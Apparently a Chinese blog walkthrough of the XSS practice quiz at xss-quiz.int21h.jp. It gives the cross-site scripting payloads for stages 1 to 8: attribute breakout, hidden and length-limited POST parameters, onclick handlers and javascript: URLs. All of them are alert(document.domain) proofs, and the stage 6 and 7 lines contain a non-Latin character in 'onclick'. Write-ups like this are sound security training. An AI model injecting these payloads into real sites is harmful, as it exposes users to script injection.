stage 1:
input:
<script>alert(document.domain)</script>stage 2:
hint: close the current tag and add SCRIPT tag...------> value="" 里面闭合
input:
"><script>alert(document.domain)</script><"或
"><script>alert(document.domain)</script><br前面闭合就好!!!
源代码显示:
<input name="p1" size="50" value="" type="text">
<script>
alert(document.domain)
</script>
<"">
<input value="Search" type="submit">stage 3:
hint: The input in text box is properly escaped. //说明输入的搜索内容已经完美转义,不能从这里寻找突破
input:
p1=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p2=Japan<script>alert(document.domain)</script>接口:
http://xss-quiz.int21h.jp/stage-3.php?sid=4030ea3d17579f608ab20b7232471efce528d53c
post请求2个参数,sid会随机变化的,根据实际的来
stage4:
hint: invisible input field
input:
p1=Tokyo&p2=Japan&p3=hackme"><script>alert(document.domain)</script><"跟stage3相同的接口,这次多了个p3的参数,这里有隐藏的 <input name="p3" value="hackme" type="hidden">
stage2 和 stage3 结合就可以了
stage5:
//输入正常的,发现有字数限制,通过修改接口,发现可以完整显示,按照stage2里的值在接口里修改即可
input:
p1="><script>alert(document.domain)</script><"stage6:
hint: event handler attributes
input:
"οnclick="alert(document.domain)源代码就会变成:
<input name="p1" size="50" value="" οnclick="alert(document.domain)" type="text">stage7:
hint: nearly the same... but a bit more tricky.
input:
" οnclick=alert(document.domain)输入这个之后,记得‘“ ’后面加一个空格,然后点击事件
源代码:
<input name="p1" size="50" value=""" οnclick="alert(document.domain)" type="text">stage8:
hint: the 'javascript' scheme.
input:
javascript:alert(document.domain)然后点击 url 就可以了
stage9:
hint:
input:
扫一扫
1130
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
